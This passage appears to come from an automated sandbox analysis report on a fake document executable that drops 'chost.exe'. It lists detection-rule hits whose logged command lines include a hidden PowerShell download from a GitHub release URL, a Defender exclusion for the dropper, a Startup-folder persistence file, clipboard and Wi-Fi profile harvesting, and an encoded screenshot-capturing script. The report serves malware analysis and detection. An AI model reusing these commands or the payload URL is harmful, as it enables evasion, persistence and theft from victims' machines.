BkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7384, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chost.exe'", ProcessId: 7264, ProcessName: cmd.exe
                    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr
                    Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
                    Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chost.exe, ProcessId: 280, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7320, TargetFilename: C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4713.tmp\4714.tmp\4715.bat "C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3852, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/' -outfile scan000373.jpg", ProcessId: 5216, ProcessName: powershell.exe
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4484, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

                    Stealing of Sensitive Information

                    barindex
                    Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: chost.exe, ParentImage: C:\Users\user\AppData\Local\Temp\chost.exe, ParentProcessId: 280, ParentProcessName: chost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7488, ProcessName: cmd.exe
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\chost.exeReversingLabs: Detection: 52%
                    Source: Cooperative Agreement0000800380.docx.exeReversingLabs: Detection: 28%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Cooperative Agreement0000800380.docx.exeJoe Sandbox ML: detected

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exeUnpacked PE file: 0.2.Cooperative Agreement0000800380.docx.exe.400000.0.unpack
                    Source: Cooperative Agreement0000800380.docx.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: chost.exe, 00000010.00000003.2018415439.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: chost.exe, 00000010.00000003.2007318540.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: ucrtbase.pdb source: chost.exe, 00000011.00000002.2384267020.00007FFDF7BE1000.00000002.00000001.01000000.0000000E.sdmp
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: chost.exe, 00000010.00000003.2006962964.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: chost.exe, 00000010.00000003.2011208039.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2008611249.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2015141052.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: chost.exe, 00000010.00000003.2008100864.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: chost.exe, 00000010.00000003.2013089820.0000025C3C15A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: chost.exe, 00000011.00000002.2386022109.00007FFE0C0A1000.00000040.00000001.01000000.00000011.sdmp
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2014895514.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009401971.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: chost.exe, 00000010.00000003.2005920546.0000025C3C151000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2019705632.0000025C3C159000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2009137175.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.16.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: chost.exe, 00000010.00000003.2011458839.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: chost.exe, 00000011.00000002.2385510396.00007FFE0029C000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: chost.exe, 00000010.00000003.2009632951.0000025C3C152000.00000004.00000020.00020000.00000000.sdmp
